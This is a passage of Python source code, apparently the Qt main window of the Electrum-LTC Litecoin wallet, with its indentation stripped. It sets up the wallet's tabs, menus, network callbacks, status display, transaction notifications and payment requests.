def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Litecoin address where the payment should be received. Note that each payment request uses a different Litecoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
